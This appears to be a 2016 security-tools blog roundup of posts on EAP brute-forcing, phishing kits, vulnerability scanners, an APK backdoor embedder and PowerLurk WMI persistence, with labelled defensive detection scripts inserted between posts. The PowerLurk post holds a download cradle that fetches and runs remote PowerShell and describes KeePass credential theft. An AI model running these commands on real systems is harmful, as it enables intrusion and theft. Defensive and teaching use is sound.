

Thursday, December 1, 2016

Automated Brute-Force Login Attacks Against EAP Networks - Auto_EAP



Auto_EAP.py is a script designed to perform automated brute-force authentication attacks against various types of EAP networks. These wireless networks provide an interface for guessing domain credentials, because the RADIUS server checks authentication against Active Directory. Using wpaspy, the Python library written by Jouni Malinen (j@w1.fi) to interact with the wpa_supplicant daemon, the authentication attempts can be automated in a way that is intended not to cause account lockouts.

Demo

./Auto_EAP.py -s HoneyPot -K WPA-EAP -E PEAP -U test.txt -p Summer2016 -i wlan0
Initialized...
Trying Username Alice with Password test: SUCCESS
Trying Username Bob with Password test: FAILED
Trying Username Charles with Password test: FAILED
Trying Username David with Password test: SUCCESS
Completed
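The demo above, seen from the defender's side, as an added example that is not part of the Auto_EAP project: the RADIUS server records one password tried against a list of accounts from the same client station, each account failing once, which is what the "no lockouts" approach looks like in the authentication log. The script parses constructed log lines (loosely modelled on per-attempt RADIUS "Auth:" lines; not real logs) and flags a station that fails against many distinct users while staying below the per-user lockout count.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample (not real logs). Station 00-11-22-33-44-55 works through a
# username list with one password, as in the demo above: two accounts happen to
# succeed and every other account fails exactly once. Station aa-bb-cc-dd-ee-ff
# is a single user mistyping their own password twice, which must not alert.
SAMPLE_LOG = """\
2016-12-01T10:00:01 Auth: Login OK: [alice] (from client ap-lobby port 0 cli 00-11-22-33-44-55)
2016-12-01T10:00:03 Auth: Login incorrect (mschap: MS-CHAP2-Response is incorrect): [bob] (from client ap-lobby port 0 cli 00-11-22-33-44-55)
2016-12-01T10:00:05 Auth: Login incorrect (mschap: MS-CHAP2-Response is incorrect): [charles] (from client ap-lobby port 0 cli 00-11-22-33-44-55)
2016-12-01T10:00:08 Auth: Login OK: [david] (from client ap-lobby port 0 cli 00-11-22-33-44-55)
2016-12-01T10:00:11 Auth: Login incorrect (mschap: MS-CHAP2-Response is incorrect): [erin] (from client ap-lobby port 0 cli 00-11-22-33-44-55)
2016-12-01T10:00:14 Auth: Login incorrect (mschap: MS-CHAP2-Response is incorrect): [frank] (from client ap-lobby port 0 cli 00-11-22-33-44-55)
2016-12-01T10:00:17 Auth: Login incorrect (mschap: MS-CHAP2-Response is incorrect): [grace] (from client ap-lobby port 0 cli 00-11-22-33-44-55)
2016-12-01T10:02:00 Auth: Login incorrect (mschap: MS-CHAP2-Response is incorrect): [heidi] (from client ap-3f port 0 cli aa-bb-cc-dd-ee-ff)
2016-12-01T10:02:09 Auth: Login incorrect (mschap: MS-CHAP2-Response is incorrect): [heidi] (from client ap-3f port 0 cli aa-bb-cc-dd-ee-ff)
2016-12-01T10:02:20 Auth: Login OK: [heidi] (from client ap-3f port 0 cli aa-bb-cc-dd-ee-ff)
"""

# One regex for both outcomes; the optional group swallows the EAP module's
# failure reason, e.g. "(mschap: MS-CHAP2-Response is incorrect)".
LINE_RE = re.compile(
    r"^(?P<ts>\S+) Auth: Login (?P<result>OK|incorrect)(?: \([^)]*\))?: "
    r"\[(?P<user>[^\]]+)\] \(from client (?P<nas>\S+) port \d+ cli (?P<cli>\S+)\)$"
)

def parse_auth_log(text):
    """Turn matching lines into event dicts; non-matching lines are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            events.append({"ts": datetime.fromisoformat(m["ts"]), "ok": m["result"] == "OK",
                           "user": m["user"], "nas": m["nas"], "cli": m["cli"]})
    return events

def detect_spray(events, window=timedelta(minutes=10), min_users=5, max_per_user=2):
    """Flag a station that fails against at least min_users distinct accounts
    inside `window` while never exceeding max_per_user failures on any single
    account. Per-account lockout counters never trip on this pattern, so the
    detection has to aggregate per source station instead of per account."""
    failures = defaultdict(list)
    for e in events:
        if not e["ok"]:
            failures[e["cli"]].append(e)
    findings = []
    for cli, fails in failures.items():
        fails.sort(key=lambda e: e["ts"])
        start = 0
        for end in range(len(fails)):
            while fails[end]["ts"] - fails[start]["ts"] > window:
                start += 1          # slide the window forward
            per_user = defaultdict(int)
            for e in fails[start:end + 1]:
                per_user[e["user"]] += 1
            if len(per_user) >= min_users and max(per_user.values()) <= max_per_user:
                findings.append({"cli": cli, "nas": fails[start]["nas"],
                                 "users": sorted(per_user),
                                 "first": fails[start]["ts"], "last": fails[end]["ts"]})
                break               # one finding per station is enough for an alert
    return findings

def run_sample():
    return detect_spray(parse_auth_log(SAMPLE_LOG))

if __name__ == "__main__":
    for f in run_sample():
        print("password spray from %s via %s: %d accounts between %s and %s"
              % (f["cli"], f["nas"], len(f["users"]), f["first"], f["last"]))
```

The calling station (cli) is the client's own MAC address and is trivially changed per attempt, so a production rule should also aggregate per access point (nas) and per SSID. Tuning min_users and max_per_user against your real lockout policy is what keeps the heidi-style mistyped password out of the alert stream.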


Installation

Run 'RunMeFirst.py' within the root directory of Auto_EAP. This will compile the wpaspy library and set up a stand-alone wpa_supplicant.conf file that Auto_EAP.py will use for testing, leaving the system's wpa_supplicant config file untouched.

Help

./Auto_EAP.py -h
usage: Auto_EAP.py [-h] -i Interface -s SSID -U Usernamefile -p Password -K Key_mgmt -E Eap_type

optional arguments:
  -h, --help                            show this help message and exit
  -i Interface, --interface Interface   The Interface to use
  -s SSID, --ssid SSID                  The SSID to attack
  -U Usernamefile, --User Usernamefile  Path to username file
  -p Password, --password Password      Password to use
  -K Key_mgmt, --key_mgmt Key_mgmt      Key_Management type to use
  -E Eap_type, --eap_type Eap_type      Eap type to use


Todo list

  • [✓] Resolved bug with .a type wireless cards (shout out to Havok0x90 for his help in resolving this issue)
  • [-] Add multi-threading functionality
  • [-] Add support for password lists



Phishing Campaign Toolkit - King Phisher 1.5.2



King Phisher is a tool for testing and promoting user awareness by simulating real world phishing attacks. It features an easy to use, yet very flexible architecture allowing full control over both emails and server content. King Phisher can be used to run campaigns ranging from simple awareness training to more complicated scenarios in which user aware content is served for harvesting credentials.
King Phisher is only to be used for legal applications when the explicit permission of the targeted organization has been obtained.
Get the latest stable version from the GitHub Releases Page or use git to checkout the project from source.
For instructions on how to install, please see the INSTALL.md file. After installing, for instructions on how to get started please see the wiki.

Feature Overview
  • Run multiple phishing campaigns simultaneously
  • Send email with embedded images for a more legitimate appearance
  • Optional Two-Factor authentication
  • Credential harvesting from landing pages
  • SMS alerts regarding campaign status
  • Web page cloning capabilities
  • Integrated Sender Policy Framework (SPF) checks
  • Geo location of phishing visitors
  • Send email with calendar invitations

Plugins
Both the client and server can be extended with functionality provided by plugins. A small number of plugins are packaged with King Phisher and additional ones are available in the Plugins repository.

Template Files
Template files for both messages and server pages can be found in the separate King Phisher Templates repository. Any contributions regarding templates should also be submitted via a pull request to the templates repository.

Message Template Variables
The client message templates are formatted using the Jinja2 templating engine and support a number of variables. These are included here as a reference; check the templates wiki page for comprehensive documentation.

Variable Name            Variable Value
client.company_name      The target's company name
client.email_address     The target's email address
client.first_name        The target's first name
client.last_name         The target's last name
client.message_id        The unique tracking identifier (this is the same as uid)
sender.email             The email address in the "Source Email (MIME)" field
sender.friendly_alias    The value of the "Friendly Alias" field
sender.reply_to          The value of the "Reply To" field
url.tracking_dot         URL of an image used for message tracking
url.webserver            Phishing server URL with the uid parameter
url.webserver_raw        Phishing server URL without any parameters
tracking_dot_image_tag   The tracking image in a preformatted <img /> tag
uid                      The unique tracking identifier (this is the same as client.message_id)

The uid is the most important, and must be present in links that the messages contain.

Documentation
Documentation for users of the application is provided on the project's wiki page. This includes steps to help new users get started with their first campaigns. Additional technical documentation intended for developers is kept separate, as outlined in the section below.

Code Documentation
King Phisher uses Sphinx for internal technical documentation. This documentation can be generated from source with the command sphinx-build -b html docs/source docs/html. The latest documentation is kindly hosted on ReadTheDocs at king-phisher.readthedocs.io.

License
King Phisher is released under the BSD 3-clause license, for more details see the LICENSE file.

Credits
Special Thanks (QA / Beta Testing):
  • Jake Garlie - jagar
  • Jeremy Schoeneman - Shad0wman
  • Ken Smith - p4tchw0rk
  • Brianna Whittaker
King Phisher Development Team:



The Ultimate WordPress Audit Trail Plugin - WP Security Audit Log

The WP Security Audit Log plugin is a WordPress plugin that keeps an audit trail of everything that happens on your WordPress site and WordPress multisite network. There are several WordPress audit trail / log plugins available, though we chose to review WP Security Audit Log because it has the most comprehensive logging and the best coverage of WordPress changes. It is also the most complete and mature WordPress audit trail solution.

Why Do You Need a WordPress Audit Trail?

First things first: why would you need a WordPress audit trail? A WordPress audit trail is a record, or rather a log, of every change that happened on your WordPress site, similar to Syslog on Linux/Unix or the Event Viewer on Microsoft Windows. The WordPress audit trail can be used to:
  • Keep track of users' productivity (ideal for multi-user setups),
  • Ease troubleshooting in case something is wrong with the WordPress website,
  • Identify possible malicious WordPress hack attacks before they actually happen,
  • Catch hackers red-handed if they manage to hack into your WordPress site,
  • Do the forensics to trace which security hole the hackers exploited so you can close it.

The above are just a few reasons mostly related to WordPress security of why you would need to keep a record of all the changes that happen on your WordPress. There are many other reasons related to business and operations, for example to ensure that your business WordPress website meets today’s stringent regulatory compliance regulations, in case you’re using WordPress for your business website.

Getting Started with the WP Security Audit Log Plugin

Install the WP Security Audit Log plugin from your Plugins page in your WordPress dashboard and activate it. By default the WP Security Audit Log will keep track of all these changes on your WordPress. You can also watch the short video below for a quick introduction.


Comprehensive Tracking of WordPress Changes

The comprehensive WordPress audit trail is what sets this plugin apart from the competition. For example while the other audit log plugins simply record that a post was updated, WP Security Audit Log tells you what exactly changed in the post. For example in the screenshot below we can see that the plugin kept a record when all of the below changes happened:

  • User opened the post in the editor,
  • Author of the post was changed,
  • Title of the post was changed,
  • URL of the post was changed



In case the content is changed the alert reporting the change in the plugin will allow you to see the revision of changes, as per the below screenshot.


Fully Configurable WordPress Audit Trail Plugin

WP Security Audit Log is also a fully configurable WordPress plugin, so it allows you to customize the plugin's functionality to suit your own needs. Below is an overview of what you can configure.

Enable / Disable Alerts

The plugin keeps a record of all these WordPress changes. If, for example, you do not want to keep a record each time a logged-in user or a website visitor requests a non-existing page (HTTP 404 error), navigate to the Enable/Disable Alerts > System Activity tab and disable Alert 6007 as shown in the screenshot below.


Browse through the different categories to find the change you would like to disable or enable back.

Generic Plugin Settings

You can also configure things such as:
  • Support for WAFs and reverse proxy (more information on this option),
  • Specify who can access the plugin’s settings and manage it,
  • Enable logging, developer options,
  • And much more.

Audit Trail Settings

In the Audit Log / Trail settings you can configure settings related to the WordPress audit trail, such as:
  • Automatic pruning of alerts from the audit trail,
  • Who can view the WordPress audit trail,
  • The time zone the plugin uses to timestamp the WordPress changes etc.

Exclude Objects from Monitoring

You can also exclude the following from being recorded in the WordPress audit trail:
  • Specific users or roles,
  • Custom fields,
  • IP addresses.

Beefing Up the WordPress Audit Trail

Keeping an audit trail of all the changes that happen is a WordPress security best practice but who has the time to check the log every few minutes? The good news is that you do not need to. WP Security Audit Log has a number of premium add-ons so you can:
  • Configure email notifications so you are alerted instantly via email of important changes on your WordPress,
  • Do free text based searches so you can find that specific change when troubleshooting an issue,
  • Generate reports for managers, to monitor users’ productivity and for regulatory compliance reasons,
  • See who is logged in and block multiple sessions from the same username.

 You can add all of the above functionality to get the best out of your WordPress audit trail solution by purchasing the All Add-Ons bundle. Prices start from as low as $89.



Friday, November 18, 2016

Black Box vBulletin Vulnerability Scanner - VBScan 0.1.7



OWASP VBScan (short for [VB]ulletin Vulnerability [Scan]ner) is an open-source project written in Perl that detects vBulletin CMS vulnerabilities and analyses them.

Why OWASP VBScan?
If you want to do a penetration test on a vBulletin forum, OWASP VBScan is your best shot ever! The project is faster than ever and updated with the latest vBulletin vulnerabilities.

Usage:
./vbscan.pl <target>
./vbscan.pl http://target.com/vbulletin



What’s New in Version 0.1.7 [Dennis Ritchie]
OWASP VBScan 0.1.7 [Larry Wall]
  • Updated exploit database
  • Compatible With Windows [Linux,OSX,Windows]
  • Added Full Path Disclosure (FPD) module
  • Added firewall detect/bypass module
  • Optimized version checker module engine [#12 issue]
  • Upgrade config finder module
  • Random user agent module set as default setting
  • Added HTML Report



Lightweight and Powerful Penetration Testing OS - DracOS



Dracos Linux (www.dracos-linux.org) is an open-source Linux operating system from Indonesia, built on Linux From Scratch and released under the GNU General Public License v3.0. It is a Linux distribution used for security testing (penetration testing). Dracos Linux is armed with hundreds of penetration testing, forensics and reverse engineering tools. It does not use GUI-based tools; all of its software operates through the CLI (command line interface). Dracos is currently at version 2.0, code-named "Leak".


Development goals

Education
Dracos Linux is intended for education, especially for getting to know the Linux operating system, and we respect ethical hacking.

Build from source
Dracos has always been built from source code rather than from an installer; this is meant to keep users in Indonesia creative and to build the spirit of open source.

Repository
Even though it is built from source, Dracos Linux still intends to set up a repository to ease the build process, like Venomizer.

Heavy Control
We need to acknowledge that this operating system is very difficult, because Dracos is built from source code, which forces us to compile when installing a package or piece of software; this of course raises the possibility of system failures and other system vulnerabilities.

Always from terminal
None of the tools installed in the OS uses a GUI. The CLI is always preferred, in particular with Openbox, to ease the work of users who need multiple terminals when performing penetration testing.

Penetration Tools List
Link : http://dev.dracos-linux.org/projects/dracoslinux/wiki/Penetration_Testing
  • Information Gathering
  • Vulnerability Assessment
  • Web Attack
  • Exploitation Testing
  • Privilege Escalation
  • Password Attack
  • Social Engineering
  • Man In The Middle Attack
  • Stress Testing
  • Wireless Attack
  • Maintaining Access
  • Forensics Tools
  • Reverse Engineering
  • Malware Analysis
  • Covering Track


Sunday, November 6, 2016

Mirai Source Code Released




The source code of the IoT botnet Mirai has been published online by its author along with configuration and set-up details. Naturally, web security analysts are expecting a series of online attacks from malicious threat actors. The reason for their concern is that this code can easily turn any hackable, that is, unsecured or unprotected, device such as routers, web cameras and phones into DDoS bots. These bots can then be used to attack websites and take them offline.






Tuesday, November 1, 2016

Modern mass media manipulation methods are types of distraction - Media Manipulation






Media manipulation is a series of related techniques in which partisans create an image or argument that favours their particular interests. Such tactics may include the use of logical fallacies and propaganda techniques, and often involve the suppression of information or points of view by crowding them out, by inducing other people or groups of people to stop listening to certain arguments, or by simply diverting attention elsewhere. In Propaganda: The Formation of Men's Attitudes, Jacques Ellul writes that public opinion can only express itself through channels which are provided by the mass media of communication – without which there could be no propaganda. It is used within public relations, propaganda, marketing, etc. While the objective for each context is quite different, the broad techniques are often similar.






By OffSec

An utility like pkg-audit for Arch Linux - arch-audit



A utility like pkg-audit for Arch Linux. It uses the data collected by the awesome Arch CVE Monitoring Team.

Installation

From AUR
The PKGBUILD is available on AUR.
After the installation just execute arch-audit.

From sources
git clone https://github.com/ilpianista/arch-audit
cd arch-audit
cargo build
cargo run

Example output
$ arch-audit
Package libwmf is affected by ["CVE-2009-1364", "CVE-2006-3376", "CVE-2007-0455", "CVE-2007-2756", "CVE-2007-3472", "CVE-2007-3473", "CVE-2007-3477", "CVE-2009-3546", "CVE-2015-0848", "CVE-2015-4588", "CVE-2015-4695", "CVE-2015-4696"]. VULNERABLE!
Package libtiff is affected by ["CVE-2016-5875", "CVE-2016-5314", "CVE-2016-5315", "CVE-2016-5316", "CVE-2016-5317", "CVE-2016-5320", "CVE-2016-5321", "CVE-2016-5322", "CVE-2016-5323", "CVE-2016-5102", "CVE-2016-3991", "CVE-2016-3990", "CVE-2016-3945", "CVE-2016-3658", "CVE-2016-3634", "CVE-2016-3633", "CVE-2016-3632", "CVE-2016-3631", "CVE-2016-3625", "CVE-2016-3624", "CVE-2016-3623", "CVE-2016-3622", "CVE-2016-3621", "CVE-2016-3620", "CVE-2016-3619", "CVE-2016-3186", "CVE-2015-8668", "CVE-2015-7313", "CVE-2014-8130", "CVE-2014-8127", "CVE-2010-2596", "CVE-2016-6223"]. VULNERABLE!
Package libtiff is affected by ["CVE-2015-7554", "CVE-2015-8683"]. VULNERABLE!
Package jasper is affected by ["CVE-2015-8751"]. VULNERABLE!
Package jasper is affected by ["CVE-2015-5221"]. VULNERABLE!
Package jasper is affected by ["CVE-2015-5203"]. VULNERABLE!
Package lib32-openssl is affected by ["CVE-2016-2177", "CVE-2016-2178", "CVE-2016-2179", "CVE-2016-2180", "CVE-2016-2181", "CVE-2016-2182", "CVE-2016-2183", "CVE-2016-6302", "CVE-2016-6303", "CVE-2016-6304", "CVE-2016-6306"]. Update to 1:1.0.2.i-1!
Package wireshark-cli is affected by ["CVE-2016-7180", "CVE-2016-7175", "CVE-2016-7176", "CVE-2016-7177", "CVE-2016-7178", "CVE-2016-7179"]. Update to 2.2.0-1!
Package wpa_supplicant is affected by ["CVE-2016-4477", "CVE-2016-4476"]. VULNERABLE!
Package openssl is affected by ["CVE-2016-2177", "CVE-2016-2178", "CVE-2016-2179", "CVE-2016-2180", "CVE-2016-2181", "CVE-2016-2182", "CVE-2016-2183", "CVE-2016-6302", "CVE-2016-6303", "CVE-2016-6304", "CVE-2016-6306"]. Update to 1.0.2.i-1!
Package crypto++ is affected by ["CVE-2016-7420"]. VULNERABLE!
Package bzip2 is affected by ["CVE-2016-3189"]. VULNERABLE!
Package libimobiledevice is affected by ["CVE-2016-5104"]. VULNERABLE!
Package libusbmuxd is affected by ["CVE-2016-5104"]. VULNERABLE!
Package gdk-pixbuf2 is affected by ["CVE-2016-6352"]. VULNERABLE!

$ arch-audit --upgradable --quiet
wireshark-cli>=2.2.0-1
openssl>=1.0.2.i-1
lib32-openssl>=1:1.0.2.i-1

$ arch-audit -uf "%n|%c"
openssl|CVE-2016-2177,CVE-2016-2178,CVE-2016-2179,CVE-2016-2180,CVE-2016-2181,CVE-2016-2182,CVE-2016-2183,CVE-2016-6302,CVE-2016-6303,CVE-2016-6304,CVE-2016-6306
wireshark-cli|CVE-2016-7180,CVE-2016-7175,CVE-2016-7176,CVE-2016-7177,CVE-2016-7178,CVE-2016-7179
lib32-openssl|CVE-2016-2177,CVE-2016-2178,CVE-2016-2179,CVE-2016-2180,CVE-2016-2181,CVE-2016-2182,CVE-2016-2183,CVE-2016-6302,CVE-2016-6303,CVE-2016-6304,CVE-2016-6306
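An added example, not part of arch-audit: a small parser for the default output format shown above that merges the per-advisory lines into one record per package (jasper appears three times), separates packages that already have a fixed version from those still marked VULNERABLE!, and regenerates the pkg>=version lines that --upgradable --quiet prints. The sample input is copied from the output above; the line format it assumes is the one visible there.

```python
import json
import re

# Input lines copied from the arch-audit output above. The default format is
# 'Package NAME is affected by [JSON list of CVEs].' followed by either
# 'VULNERABLE!' (no fixed package yet) or 'Update to VERSION!'.
SAMPLE_OUTPUT = """\
Package jasper is affected by ["CVE-2015-8751"]. VULNERABLE!
Package jasper is affected by ["CVE-2015-5221"]. VULNERABLE!
Package jasper is affected by ["CVE-2015-5203"]. VULNERABLE!
Package lib32-openssl is affected by ["CVE-2016-2177", "CVE-2016-2178", "CVE-2016-2179", "CVE-2016-2180", "CVE-2016-2181", "CVE-2016-2182", "CVE-2016-2183", "CVE-2016-6302", "CVE-2016-6303", "CVE-2016-6304", "CVE-2016-6306"]. Update to 1:1.0.2.i-1!
Package wireshark-cli is affected by ["CVE-2016-7180", "CVE-2016-7175", "CVE-2016-7176", "CVE-2016-7177", "CVE-2016-7178", "CVE-2016-7179"]. Update to 2.2.0-1!
Package wpa_supplicant is affected by ["CVE-2016-4477", "CVE-2016-4476"]. VULNERABLE!
Package openssl is affected by ["CVE-2016-2177", "CVE-2016-2178", "CVE-2016-2179", "CVE-2016-2180", "CVE-2016-2181", "CVE-2016-2182", "CVE-2016-2183", "CVE-2016-6302", "CVE-2016-6303", "CVE-2016-6304", "CVE-2016-6306"]. Update to 1.0.2.i-1!
Package crypto++ is affected by ["CVE-2016-7420"]. VULNERABLE!
"""

# The CVE list is valid JSON, so json.loads does the quoting for us. The fix
# version may carry a pacman epoch prefix ("1:1.0.2.i-1"), hence \S+.
LINE_RE = re.compile(
    r"^Package (?P<pkg>\S+) is affected by (?P<cves>\[.*\])\. "
    r"(?:VULNERABLE!|Update to (?P<fix>\S+)!)$"
)

def parse_report(text):
    """Parse default-format lines into (package, cves, fix) tuples.
    Non-matching, non-blank lines are returned separately so that a format
    change in a future arch-audit release is noticed rather than ignored."""
    findings, unparsed = [], []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            findings.append((m["pkg"], json.loads(m["cves"]), m["fix"]))
        elif line.strip():
            unparsed.append(line)
    return findings, unparsed

def summarize(findings):
    """One record per package: the union of its CVEs and the fixed version, if any.
    A package is printed once per advisory, so the same package can recur."""
    merged = {}
    for pkg, cves, fix in findings:
        rec = merged.setdefault(pkg, {"cves": set(), "fix": None})
        rec["cves"].update(cves)
        if fix:
            rec["fix"] = fix
    return {pkg: {"cves": sorted(r["cves"]), "fix": r["fix"]} for pkg, r in merged.items()}

def upgrade_specs(summary):
    """The pkg>=version lines that 'arch-audit --upgradable --quiet' prints."""
    return sorted("%s>=%s" % (pkg, r["fix"]) for pkg, r in summary.items() if r["fix"])

def unfixed(summary):
    """Packages still VULNERABLE! with no packaged fix: track, mitigate or remove."""
    return sorted(pkg for pkg, r in summary.items() if not r["fix"])

if __name__ == "__main__":
    findings, unparsed = parse_report(SAMPLE_OUTPUT)
    summary = summarize(findings)
    print("upgrade now:", *upgrade_specs(summary))
    print("no fix yet: ", *unfixed(summary))
    for line in unparsed:
        print("could not parse:", line)
```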




Android APK Backdoor Embedder - Spade



Quick and handy APK backdoor embedder with metasploit android payloads.

Requirements

Installation and execution
You can download spade by cloning the Git repository:
git clone https://github.com/suraj-root/spade.git
cd spade/
./spade.py




Exploit Network and Gathering Information with Nmap - Dracnmap



Dracnmap is an open source program used to exploit the network and gather information with the help of nmap. The nmap command comes with lots of options that can make the utility more robust but also difficult to follow for new users. Dracnmap is therefore designed to perform fast scanning using nmap's scripting engine, so that nmap can run various automated scanning techniques with its advanced commands.



Getting Started
git clone https://github.com/Screetsec/Dracnmap.git
cd Dracnmap
chmod +x Dracnmap.sh
sudo ./Dracnmap.sh or sudo su ./Dracnmap.sh

Requirements
  • A Linux operating system. We recommend Kali Linux 2 or Kali 2016.1 rolling / Cyborg / Parrot / Dracos / BackTrack / BackBox / or another Linux operating system
  • Must install nmap

Tutorial
You can visit my channel: https://www.youtube.com/channel/UCpK9IXzLMfVFp9NUfDzxFfw

Credits



KNXnet/IP scanning and auditing tool for KNX home automation installations - KNXmap



A tool for scanning and auditing KNXnet/IP gateways on IP networks. KNXnet/IP defines Ethernet as the physical communication medium for KNX (EN 50090, ISO/IEC 14543). KNXmap can also scan for devices on the KNX bus through KNXnet/IP gateways. Beyond scanning, KNXmap supports other modes of interacting with KNX gateways, such as monitoring bus messages or writing arbitrary values to group addresses.

Compatibility
KNXmap requires Python 3.3 or newer. There are no external dependencies, everything is included in the standard library.
Note: Users of Python 3.3 need to install the asyncio module from PyPI.

Usage
Invoke knxmap.py locally or install it:
python setup.py install

Documentation
The documentation is available in the repository wiki.

Hacking
Enable full debugging and verbosity for development:
PYTHONASYNCIODEBUG=1 knxmap.py -v scan 192.168.178.20 1.1.0-1.1.6 --bus-info



Tuesday, October 25, 2016

Malicious WMI Events using PowerShell - PowerLurk



PowerLurk is a PowerShell toolset for building malicious WMI Event Subscriptions. The goal is to make WMI events easier to fire off during a penetration test or red team engagement. Please see my post Creeping on Users with WMI Events: Introducing PowerLurk for more detailed information: https://pentestarmoury.com/2016/07/13/151/

To use PowerLurk, you must import the PowerLurk.ps1 module into your instance of PowerShell. This can be done a couple of ways:
Import locally
    PS> powershell.exe -NoP -Exec ByPass -C Import-Module c:\temp\PowerLurk.ps1
Download Cradle
    PS> powershell.exe -NoP -C "IEX (New-Object Net.WebClient).DownloadString('http://<IP>/PowerLurk.ps1'); Get-WmiEvent"   

Get-WmiEvent
By default, Get-WmiEvent queries WMI for all __FilterToConsumerBinding instances and associated __EventFilter, and __EventConsumer instances. Objects returned can be deleted by piping to Remove-WmiObject.
Return all active WMI event objects with the name 'RedTeamEvent'
    Get-WmiEvent -Name RedTeamEvent   
Delete 'RedTeamEvent' WMI event objects
    Get-WmiEvent -Name RedTeamEvent | Remove-WmiObject   

Register-MaliciousWmiEvent
This cmdlet is the core of PowerLurk. It takes a command, script, or scriptblock as the action and a precanned trigger then creates the WMI Filter, Consumer, and FilterToConsumerBinding required for a fully functional Permanent WMI Event Subscription. A number of WMI event triggers, or filters, are preconfigured. The trigger must be specified with the -Trigger parameter. There are three consumers to choose from, PermanentCommand, PermanentScript, and LocalScriptBLock. Example usage:
Write the notepad.exe process ID to C:\temp\log.txt whenever notepad.exe starts
    Register-MaliciousWmiEvent -EventName LogNotepad -PermanentCommand "cmd.exe /c echo %ProcessId% >> c:\temp\log.txt" -Trigger ProcessStart -ProcessName notepad.exe
Cleanup Malicious WMI Event
    Get-WmiEvent -Name LogNotepad | Remove-WmiObject   

Add-KeeThiefLurker
Add-KeeThiefLurker creates a permanent WMI event that executes KeeThief (see @Harmj0y's KeeThief at https://github.com/adaptivethreat/KeeThief) 4 minutes after the 'keepass' process starts. This gives the target time to log into their KeePass database.
The KeeThief logic and its output are stored either in a custom WMI namespace and class or in registry values. If a custom WMI namespace and class are selected, you have the option to expose that namespace so that it can be read remotely by 'Everyone'. Registry path and value names are customizable using the associated switches; however, this is optional as defaults are set. Example usage:
Add KeeThiefLurker event using WMI class storage
    Add-KeeThiefLurker -EventName KeeThief -WMI   
Query custom WMI class
    Get-WmiObject -Namespace root\software win32_WindowsUpdate -List   
Extract KeeThief output from WMI class
    [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($(Get-WmiObject -Namespace root\software win32_WindowsUpdate -List).Properties['Output'].value))   
Cleanup KeeThiefLurker
    Remove-KeeThiefLurker -EventName KeeThief -WMI   
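An added example, not part of PowerLurk: the responder's counterpart to what Get-WmiEvent enumerates. It takes exported __EventFilter, __EventConsumer and __FilterToConsumerBinding objects from root\subscription (the dicts below are constructed, shaped like the LogNotepad subscription above next to a record modelled on the default "SCM Event Log" binding that Windows itself installs), resolves each binding's Filter and Consumer references, and reports the bindings a hunter should look at first, with the reason for each.

```python
import re

# Constructed export (not captured from a real host) of the three classes that
# make up a permanent WMI event subscription. Filters carry no __CLASS key here
# because they are all __EventFilter instances; consumers keep theirs because
# the consumer class is what decides whether code gets executed.
FILTERS = [
    {"Name": "LogNotepad", "EventNamespace": "root\\cimv2",
     "Query": "SELECT * FROM Win32_ProcessStartTrace WHERE ProcessName = 'notepad.exe'"},
    {"Name": "SCM Event Log Filter", "EventNamespace": "root\\cimv2",
     "Query": "select * from MSFT_SCMEventLogEvent"},
]
CONSUMERS = [
    {"__CLASS": "CommandLineEventConsumer", "Name": "LogNotepad",
     "CommandLineTemplate": "cmd.exe /c echo %ProcessId% >> c:\\temp\\log.txt"},
    {"__CLASS": "NTEventLogEventConsumer", "Name": "SCM Event Log Consumer",
     "CommandLineTemplate": None},
]
BINDINGS = [
    {"Filter": '__EventFilter.Name="LogNotepad"',
     "Consumer": 'CommandLineEventConsumer.Name="LogNotepad"'},
    {"Filter": '__EventFilter.Name="SCM Event Log Filter"',
     "Consumer": 'NTEventLogEventConsumer.Name="SCM Event Log Consumer"'},
    # Left-over binding whose consumer was removed but the binding was not.
    {"Filter": '__EventFilter.Name="LogNotepad"',
     "Consumer": 'ActiveScriptEventConsumer.Name="Stale"'},
]

# A binding references its filter and consumer by relative path: CLASS.Name="value".
REF_RE = re.compile(r'^(?P<cls>\w+)\.Name="(?P<name>[^"]+)"$')
# Consumer classes that run an arbitrary command line or script when triggered.
EXEC_CONSUMERS = {"CommandLineEventConsumer", "ActiveScriptEventConsumer"}
# Event classes a process-start or logon trigger would query.
TRIGGER_RE = re.compile(r"Win32_ProcessStartTrace|Win32_Process\b|Win32_LogonSession", re.I)
# Interpreters that make a command-line consumer equivalent to code execution.
INTERP_RE = re.compile(r"cmd\.exe|powershell|wscript|cscript|mshta|regsvr32", re.I)

def resolve(ref, objects):
    """Return the filter/consumer a binding points at, or None if it is gone."""
    m = REF_RE.match(ref)
    if not m:
        return None
    for obj in objects:
        if obj.get("__CLASS", "__EventFilter") == m["cls"] and obj["Name"] == m["name"]:
            return obj
    return None

def triage(filters, consumers, bindings):
    """One record per binding worth a closer look, with the reasons it was flagged."""
    findings = []
    for b in bindings:
        flt, con = resolve(b["Filter"], filters), resolve(b["Consumer"], consumers)
        reasons = []
        if flt is None or con is None:
            reasons.append("dangling reference: filter or consumer no longer exists")
        if con and con["__CLASS"] in EXEC_CONSUMERS:
            reasons.append("consumer class %s executes commands" % con["__CLASS"])
        if con and INTERP_RE.search(con.get("CommandLineTemplate") or ""):
            reasons.append("consumer launches an interpreter")
        if flt and TRIGGER_RE.search(flt["Query"]):
            reasons.append("filter fires on process start or logon")
        if reasons:
            findings.append({"filter": b["Filter"], "consumer": b["Consumer"], "reasons": reasons})
    return findings

if __name__ == "__main__":
    for f in triage(FILTERS, CONSUMERS, BINDINGS):
        print(f["filter"], "->", f["consumer"])
        for r in f["reasons"]:
            print("   ", r)
```

On a live host the same three object sets come from the root\subscription namespace, so the script works unchanged on a JSON export of those classes; the default SCM Event Log binding passes through unflagged, which is the baseline you want before anything else on the list is treated as suspicious.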

